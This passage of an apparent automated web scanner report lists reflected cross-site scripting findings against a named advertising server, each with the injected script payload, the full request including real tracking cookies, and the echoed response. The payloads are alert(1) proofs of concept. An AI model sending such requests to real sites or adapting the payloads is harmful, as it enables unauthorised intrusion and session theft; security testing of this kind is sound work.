Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 398
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:08 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmediab702d"><script>alert(1)</script>58724ec2a5d/Retarget_Secure/1249302909/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.658. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27f2d"><script>alert(1)</script>d7bc9b80311 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure27f2d"><script>alert(1)</script>d7bc9b80311/243052316@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 262
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3045525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:13 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure27f2d"><script>alert(1)</script>d7bc9b80311/L18/1309133988/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?1309133988" TARGET=_blank>

4.659. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9045f"><script>alert(1)</script>191b65027bf was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom39045f"><script>alert(1)</script>191b65027bf?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 390
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:18 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/1943704596/Bottom39045f"><script>alert(1)</script>191b65027bf/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.660. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b28"><script>alert(1)</script>8928d95ff49 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia47b28"><script>alert(1)</script>8928d95ff49/Retarget_Secure/311285161@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:57 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia47b28"><script>alert(1)</script>8928d95ff49/Retarget_Secure/805451115/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.661. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c040"><script>alert(1)</script>f6f1f1a114a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure1c040"><script>alert(1)</script>f6f1f1a114a/311285161@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 258
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3045525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:02 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure1c040"><script>alert(1)</script>f6f1f1a114a/L18/29701771/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?29701771" TARGET=_blank>

4.662. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18d3d"><script>alert(1)</script>dfdf641f922 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom318d3d"><script>alert(1)</script>dfdf641f922?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 389
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:07 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/395763225/Bottom318d3d"><script>alert(1)</script>dfdf641f922/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.663. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbc57"><script>alert(1)</script>fcf943483cb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmediadbc57"><script>alert(1)</script>fcf943483cb/Retarget_Secure/438702563@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O8016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:53 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmediadbc57"><script>alert(1)</script>fcf943483cb/Retarget_Secure/761707163/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.664. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e813"><script>alert(1)</script>f6bfea0e9d7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure7e813"><script>alert(1)</script>f6bfea0e9d7/438702563@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O8016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 262
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:58 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure7e813"><script>alert(1)</script>f6bfea0e9d7/L18/1330393018/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?1330393018" TARGET=_blank>

4.665. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a286c"><script>alert(1)</script>b1305f9c9bc was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3a286c"><script>alert(1)</script>b1305f9c9bc?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O8016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 389
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:04 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/840689523/Bottom3a286c"><script>alert(1)</script>b1305f9c9bc/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.666. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3 [_RM_HTML_MM_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3

Issue detail

The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61eca"-alert(1)-"11fefb1e2e5 was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3?_RM_HTML_MM_=61eca"-alert(1)-"11fefb1e2e5 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O8016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:46 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|R10M5i|O10M5l|R10M5p|O10M5x|R10M62|O10M69|O1012Mr|O1016F7|O8016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 580
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:49 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS");
var mm247o = "61eca"-alert(1)-"11fefb1e2e5";
var mm247m = "";
if (mm247o.length==21) {
   var i=0;
   while (i<21) {
       mm247m += mmarray[i] + mm247o.charAt(i);
       i=i+1;
   }
}
document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString()
...[SNIP]...

4.667. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28bc9"><script>alert(1)</script>a17d56d34d0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia28bc9"><script>alert(1)</script>a17d56d34d0/Retarget_Secure/509694158@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
